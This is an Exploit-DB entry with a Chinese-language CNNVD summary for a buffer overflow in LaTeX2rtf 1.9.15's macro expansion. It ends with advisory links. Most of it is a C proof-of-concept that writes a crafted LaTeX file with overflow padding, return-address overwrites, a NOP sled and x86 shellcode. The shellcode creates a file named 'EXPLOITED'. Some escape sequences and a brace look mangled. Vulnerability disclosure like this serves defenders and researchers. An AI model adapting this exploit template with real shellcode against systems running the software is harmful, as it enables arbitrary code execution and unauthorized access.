https://www.exploit-db.com/exploits/24622
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-923

LaTeX2rtf1.9.15版本及可能其他的版本存在多个缓冲区溢出漏洞。远程攻击者可以借助（1）expandmacro函数，可能还有(2)Environments和(3)TranslateCommand来执行任意代码。

/*
source: http://www.securityfocus.com/bid/11233/info

It is reported that LaTeX2rtf is susceptible to a remote buffer overflow vulnerability when handling malformed files. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable computer to gain unauthorized access. This issue is due to a failure of the application to perform proper bounds checks before copying data into a fixed sized memory buffer.

Version 1.9.15 of LaTeX2rtf is reported vulnerable to this issue. Other versions may also be affected.
*/

char center[] = {
  0x59                         /*   cx = *sp++                      */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0x40                         /*   ++ax                            */
, 0x40                         /*   ++ax                            */
, 0x40                         /*   ++ax                            */
, 0xc1, 0xe0, 0x07             /*   ax <<= 7                        */
, 0x50                         /*   *--sp = ax                 0600 */
, 0xb8, 0x12, 0x34, 0x56, 0x02 /*   ax = 0x02563412                 */
, 0xc1, 0xe8, 0x18             /*   ax >>= 24                       */
, 0xc1, 0xe0, 0x08             /*   ax <<= 8                        */
, 0x50                         /*   *--sp = ax          512:O_CREAT */
, 0x51                         /*   *--sp = cx          "EXPLOITED" */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0xb0, 0x05                   /*   ax = (ax & ~255) + 5            */
, 0x50                         /*   *--sp = ax               5:open */
, 0xcd, 0x80                   /*   syscall                         */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0x50                         /*   *--sp = ax                    0 */
, 0x40                         /*   ++ax                            */
, 0x50                         /*   *--sp = ax               1:exit */
, 0xcd, 0x80                   /*   syscall                         */
} ;

int main()
 
  int i;

  printf("\def\row#1{");

  for (i = 0;i < 1024;++i)
    putchar('x');
  for (i = 0;i < 6;++i) {
    /* preserve args[0] */
    putchar(0x40); putchar(0x6d); putchar(0x08); putchar(0x08);
  }
  for (i = 0;i < 5;++i) {
    /* smasher */
    putchar(0x40); putchar(0xf9); putchar(0xbf); putchar(0xbf);
  }

  for (i = 0;i < 256;++i)
    putchar(0x90);

  putchar(0xeb); putchar(sizeof(center));
  /* 0xeb 0x07   means   ip += 7 */
  /* assuming here that center has at most 255 bytes */

  for (i = 0;i < sizeof center;++i)
    putchar(center[i]);

  putchar(0xe8);
  putchar(251 - sizeof center); putchar(0xff); putchar(0xff); putchar(0xff);
  /* 0xe8 0xf4 0xff 0xff 0xff   means   *--sp = ip; ip -= 12 */ 

  printf("EXPLOITED");

  printf("}n");
  printf("\begin{document}n");
  printf("\row an");
  printf("\end{document}n");
}

来源:XF
名称:latex2rtf-expandmacro-bo(17460)
链接:http://xforce.iss.net/xforce/xfdb/17460
来源:SECTRACK
名称:1011367
链接:http://www.securitytracker.com/alerts/2004/Sep/1011367.html
来源:BID
名称:11233
链接:http://www.securityfocus.com/bid/11233
来源:OSVDB
名称:10216
链接:http://www.osvdb.org/displayvuln.php?osvdb_id=10216
来源:cvs.sourceforge.net
链接:http://cvs.sourceforge.net/viewcvs.py/latex2rtf/latex2rtf/definitions.c?rev=1.22&view;=log
来源:XF
名称:latex2rtf-multiple-bo(17487)
链接:http://xforce.iss.net/xforce/xfdb/17487